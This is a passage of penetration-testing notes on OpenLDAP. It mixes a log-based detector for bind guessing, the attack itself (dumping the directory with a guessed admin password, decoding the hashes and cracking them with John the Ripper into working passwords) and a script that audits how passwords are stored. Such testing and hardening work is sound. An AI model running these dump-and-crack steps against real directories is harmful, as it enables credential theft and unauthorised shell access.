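Jan 20 22:10:02 ldap slapd[1234]: conn=1002 op=0 RESULT tag=97 err=49 text=
Jan 20 22:10:02 ldap slapd[1234]: conn=1002 op=1 BIND dn="cn=admin,dc=acme,dc=com" method=128
Jan 20 22:10:02 ldap slapd[1234]: conn=1002 op=1 RESULT tag=97 err=49 text=
Jan 20 22:10:03 ldap slapd[1234]: conn=1002 op=2 BIND dn="cn=admin,dc=acme,dc=com" method=128
Jan 20 22:10:03 ldap slapd[1234]: conn=1002 op=2 RESULT tag=97 err=49 text=
Jan 20 22:10:03 ldap slapd[1234]: conn=1002 op=3 BIND dn="cn=admin,dc=acme,dc=com" method=128
Jan 20 22:10:03 ldap slapd[1234]: conn=1002 op=3 RESULT tag=97 err=0 text=
Jan 20 22:10:03 ldap slapd[1234]: conn=1002 fd=12 closed
Jan 20 22:10:09 ldap slapd[1234]: conn=1003 fd=13 ACCEPT from IP=198.51.100.7:40000 (IP=0.0.0.0:389)
Jan 20 22:10:09 ldap slapd[1234]: conn=1003 op=0 BIND dn="uid=jsmith,ou=people,dc=acme,dc=com" method=128
Jan 20 22:10:09 ldap slapd[1234]: conn=1003 op=0 RESULT tag=97 err=0 text=
"""

RE_ACCEPT  = re.compile(r"conn=(\d+) fd=\d+ ACCEPT from IP=([\d.]+):\d+")
RE_BIND    = re.compile(r'conn=(\d+) op=(\d+) BIND dn="([^"]*)"')
RE_BINDRES = re.compile(r"conn=(\d+) op=(\d+) RESULT tag=97 err=(\d+)")   # tag 97 = BindResponse
RE_SRCH    = re.compile(r'conn=(\d+) op=\d+ SRCH base=.* filter="\(uid=([^)]*)\)"')


def analyze(log_text, fail_threshold=3, probe_threshold=3):
    """Return a list of alert dicts for bind guessing and anonymous uid enumeration."""
    conn_ip = {}                    # conn id -> client IP, learned from the ACCEPT line
    pending_bind = {}               # (conn, op) -> DN of a BIND still waiting for its RESULT
    bound = set()                   # conns that completed a non-anonymous bind
    failures = defaultdict(int)     # (ip, dn) -> number of err=49 bind results
    succeeded = set()               # (ip, dn) where a success followed earlier failures
    probes = defaultdict(set)       # (ip, conn) -> distinct uid values searched unauthenticated

    for line in log_text.splitlines():
        if m := RE_ACCEPT.search(line):
            conn_ip[m.group(1)] = m.group(2)
        elif m := RE_BIND.search(line):
            pending_bind[(m.group(1), m.group(2))] = m.group(3)
        elif m := RE_BINDRES.search(line):
            conn, op, err = m.groups()
            dn = pending_bind.pop((conn, op), "")
            key = (conn_ip.get(conn, "?"), dn)
            if err == "49":                       # LDAP_INVALID_CREDENTIALS
                failures[key] += 1
            elif err == "0" and dn:               # successful, non-anonymous bind
                bound.add(conn)
                if failures.get(key, 0):
                    succeeded.add(key)
        elif m := RE_SRCH.search(line):
            conn, uid = m.groups()
            if conn not in bound:
                probes[(conn_ip.get(conn, "?"), conn)].add(uid)

    alerts = []
    for (ip, dn), n in failures.items():
        if n >= fail_threshold:
            alerts.append({"type": "bind_dictionary", "ip": ip, "dn": dn,
                           "failures": n, "succeeded": (ip, dn) in succeeded})
    for (ip, conn), uids in probes.items():
        if len(uids) >= probe_threshold:
            alerts.append({"type": "anon_uid_enum", "ip": ip, "conn": conn, "uids": len(uids)})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The `succeeded` flag is the one to page on: a run of err=49 results followed by err=0 for the same DN and address is a guessed password, not a user mistyping. On the server side, `olcDisallows: bind_anon` together with `olcRequires: authc` stops the anonymous uid enumeration outright, and the ppolicy overlay's `pwdMaxFailure` and `pwdLockout` cap how many guesses a DN will accept before the bind loop stops producing anything but failures.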

Dumping data

If we run ldapsearch as the admin user with the password we found and a search filter of (objectClass=*), we get a dump of the whole directory tree.

root@asus:~/pentest_notes% ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
# extended LDIF
#
# LDAPv3
# base  (default) with scope subtree
# filter: (objectclass=*)
# requesting: * 
#

# acme.com
dn: dc=acme,dc=com
objectClass: top
objectClass: dcObject
objectClass: organization
o: Acme
dc: acme

# admin, acme.com
dn: cn=admin,dc=acme,dc=com
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9SW5uaE9PdFRmdENveWhPUDFTUFVnSnNMZ3ZxSVA3aUw=

# ldapusers, acme.com
dn: cn=ldapusers,dc=acme,dc=com
...
root@asus:~/pentest_notes%

Cracking OpenLDAP Passwords

The password hashes are base64-encoded in the LDIF output (the `::` after the attribute name), so we can easily decode the string to extract the hash:

root@asus:~/pentest_notes% echo "e01ENX0wTHVBcXJ1R0diYmpVUlB3TG5KMUt3PT0=" | base64 -d
{MD5}0LuAqruGGbbjURPwLnJ1Kw==
root@asus:~/pentest_notes%

All these hashes can be loaded into JTR and cracked, and the recovered passwords can then be used to get shell access on the remote system.

root@asus:~/src/john/run% ./john --wordlist=/home/sam/pentest_notes/rockyou.txt /home/sam/openldap.txt       
Using default input encoding: UTF-8
Loaded 8 password hashes with no different salts (Raw-MD5 [MD5 128/128 SSE4.1 4x3])
Remaining 7 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (hahmad)
education        (ealvarez)
kumar            (skumar)
jsmith           (jsmith)
instructor       (tmoreau)
hindu            (vpatel)
6g 0:00:00:04 DONE (2019-01-20 22:18) 1.360g/s 3252Kp/s 3252Kc/s 3363KC/s  filimani.¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
root@asus:~/src/john/run%
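The John run above shows why the storage scheme matters more than the directory ACLs once a dump is in hand: the unsalted {MD5} hashes fall in four seconds, while the admin entry uses {SSHA}. The following Python is an added example, not part of these notes, that parses an LDIF dump the way ldapsearch prints it (unfolding wrapped lines, honouring the `::` base64 marker), decodes each userPassword and reports which scheme every entry uses, so that cleartext and fast-hash accounts can be found and migrated before someone else finds them. The LDIF is constructed: the first two hashes are the two values decoded above, the remaining entries are made-up strings.

```python
"""Audit the password storage scheme of every userPassword in an LDIF dump.

Added example; the LDIF below is constructed in the shape ldapsearch prints.
"""
import base64
import re


def _b64(text):
    """Base64-encode a value the way LDIF does for a 'userPassword::' line."""
    return base64.b64encode(text.encode()).decode()


# Constructed sample. The first two hashes are the two values decoded in the
# notes above; the remaining entries are made-up hash strings, not real accounts.
SAMPLE_LDIF = (
    "# admin, acme.com\n"
    "dn: cn=admin,dc=acme,dc=com\n"
    "userPassword:: e1NTSEF9SW5uaE9PdFRmdENveWhPUDFTUFVnSnNMZ3ZxSVA3aUw=\n"
    "\n"
    "dn: uid=hahmad,ou=people,dc=acme,dc=com\n"
    "userPassword:: e01ENX0wTHVBcXJ1R0di\n"          # folded over two lines, as ldapsearch does
    " YmpVUlB3TG5KMUt3PT0=\n"
    "\n"
    "dn: uid=jsmith,ou=people,dc=acme,dc=com\n"
    "userPassword: plaintext-secret\n"
    "\n"
    "dn: uid=vpatel,ou=people,dc=acme,dc=com\n"
    "userPassword:: " + _b64("{CRYPT}$6$constructedsalt$constructedhash") + "\n"
    "\n"
    "dn: uid=tmoreau,ou=people,dc=acme,dc=com\n"
    "userPassword:: " + _b64("{ARGON2}$argon2id$v=19$m=65536,t=2,p=1$c2FsdA$constructed") + "\n"
)

# Ratings: fast digests (salted or not) that John chews through at millions of
# guesses per second, versus slow, salted password hashes.
SCHEME_RATING = {
    "CLEARTEXT": "critical",
    "MD5": "weak", "SHA": "weak", "SMD5": "weak",
    "SSHA": "legacy",
    "SSHA256": "ok", "SSHA384": "ok", "SSHA512": "ok",
    "PBKDF2-SHA256": "ok", "PBKDF2-SHA512": "ok", "ARGON2": "ok",
}


def unfold(ldif_text):
    """Join LDIF continuation lines (a leading space) back onto the line they extend."""
    lines = []
    for raw in ldif_text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_passwords(ldif_text):
    """Return (dn, raw userPassword bytes) pairs; '::' marks a base64-encoded value."""
    entries, dn = [], None
    for line in unfold(ldif_text):
        if not line.strip() or line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        is_b64 = value.startswith(":")
        value = value[1:].strip() if is_b64 else value.strip()
        if attr.lower() == "dn":
            dn = base64.b64decode(value).decode() if is_b64 else value
        elif attr.lower() == "userpassword":
            entries.append((dn, base64.b64decode(value) if is_b64 else value.encode()))
    return entries


def classify(value):
    """Return (scheme, rating) for one stored userPassword value."""
    m = re.match(rb"\{([A-Za-z0-9-]+)\}(.*)", value, re.S)
    if not m:
        return "CLEARTEXT", "critical"        # no {SCHEME} prefix: stored as typed
    scheme, rest = m.group(1).decode().upper(), m.group(2)
    if scheme == "CRYPT":
        # crypt(3) strength depends on the variant: sha512crypt, sha256crypt and
        # bcrypt are fine, md5crypt and traditional DES are not
        ok = rest.startswith((b"$6$", b"$5$", b"$2a$", b"$2b$", b"$2y$"))
        return scheme, "ok" if ok else "weak"
    return scheme, SCHEME_RATING.get(scheme, "unknown")


def audit(ldif_text):
    """Classify every userPassword in the dump."""
    return [{"dn": dn, "scheme": scheme, "rating": rating}
            for dn, raw in parse_passwords(ldif_text)
            for scheme, rating in [classify(raw)]]


if __name__ == "__main__":
    for row in audit(SAMPLE_LDIF):
        print(f'{row["rating"]:8} {row["scheme"]:10} {row["dn"]}')
```

Run it over the output of the ldapsearch command shown above and sort by rating. Changing `olcPasswordHash` in cn=config only affects passwords set afterwards through the Password Modify extended operation, so the entries this script flags stay weak until each user's password is changed; the audit is what tells you whether that migration has actually finished.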

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...